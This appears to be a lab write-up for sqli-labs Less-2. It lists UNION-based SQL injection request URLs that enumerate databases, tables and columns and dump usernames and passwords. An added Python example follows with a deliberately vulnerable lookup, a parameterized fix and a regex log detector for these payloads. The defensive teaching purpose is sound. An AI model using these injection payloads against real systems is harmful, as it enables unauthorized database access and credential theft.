1. Determine the injection point
and 1=1, and 1=2, ' and similar probes
2. Use order by to find the number of columns the query returns
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3#
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4#
3. Use union for a combined query and find which column positions are displayed on the page
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,3#
4. Dump the database name and the current user
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,database(),current_user()#
Dump all databases
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata#
5. Dump the table names in the database
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
6. Dump the column names in the table
http://127.0.0.1/sql/Less-2/?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3-- +
7. Dump usernames and passwords
http://127.0.0.1/sql/Less-1/?id=0 union select 1,(select concat_ws(0x7e,username,password) from users limit 1,1),3-- +
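The steps above all rest on one defect: the numeric id parameter is concatenated into the SQL text, so a value such as 0 union select ... becomes part of the statement. The block below is an added example, not code from the sqli-labs project or from this write-up. It reproduces that pattern against an in-memory SQLite table (SQLite instead of MySQL, so no information_schema; the users table and its rows are constructed) next to the validated, parameterized query that closes it, and adds a small check that flags the UNION / information_schema / order by patterns in constructed web-server log lines. The log lines, the users table contents and the function names are all assumptions made for this example.

```python
"""Added example: Less-2 style numeric injection in vulnerable and hardened
form, plus a log check for the union/information_schema request patterns.
All data below is constructed for the example."""
import re
import sqlite3
from urllib.parse import parse_qs, unquote_plus, urlsplit


def make_db():
    # Constructed sample table; mirrors the write-up's users table shape only.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # Less-2 pattern: the parameter is pasted into the statement unquoted,
    # so "0 union select 1,2,3" turns one lookup into two SELECTs.
    sql = "SELECT id, username, password FROM users WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, user_id):
    # Validate the type first (rejects "1 order by 3", "0 union ..." outright),
    # then bind the value; bound parameters can never change the SQL structure.
    uid = int(user_id)  # raises ValueError for anything that is not an integer
    return conn.execute(
        "SELECT id, username, password FROM users WHERE id=?", (uid,)
    ).fetchall()


# Request patterns the write-up's steps produce in a server access log.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    re.compile(r"\binformation_schema\.", re.I),
    re.compile(r"\border\s+by\s+\d+", re.I),
    re.compile(r"\b(group_concat|concat_ws|database|current_user)\s*\(", re.I),
    re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def suspicious_params(url):
    """Return the query parameter names whose decoded value matches a pattern."""
    query = urlsplit(url).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)  # handles double-encoded payloads too
            if any(p.search(decoded) for p in SQLI_PATTERNS):
                hits.append(name)
                break
    return hits


def scan_log(lines):
    """Return (line_index, [param names]) for every log line that looks like SQLi."""
    findings = []
    for i, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        params = suspicious_params(m.group(1))
        if params:
            findings.append((i, params))
    return findings


# Constructed access-log lines in the shape the write-up's requests would leave
# (the browser percent-encodes "#" as %23 and spaces as "+").
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:00:00:00 +0000] "GET /sqli-labs-master/Less-2/?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:00:00:01 +0000] "GET /sqli-labs-master/Less-2/?id=1+order+by+3%23 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:00:00:02 +0000] "GET /sqli-labs-master/Less-2/?id=0+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata%23 HTTP/1.1" 200 640',
    '127.0.0.1 - - [01/Jan/2024:00:00:03 +0000] "GET /sqli-labs-master/Less-2/?id=2 HTTP/1.1" 200 512',
]


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "0 union select 1,2,3"))  # attacker-chosen row
    try:
        lookup_hardened(db, "0 union select 1,2,3")
    except ValueError as exc:
        print("hardened lookup rejected input:", exc)
    print(scan_log(SAMPLE_LOG))
```

The hardened lookup does two independent things: integer validation stops the request at the boundary, and the bound parameter means that even a value which passed validation cannot alter the statement. The log check is deliberately pattern-based and case-insensitive on the decoded parameter value; it is a triage aid for spotting the enumeration sequence above (order by probing followed by information_schema reads), not a replacement for fixing the query.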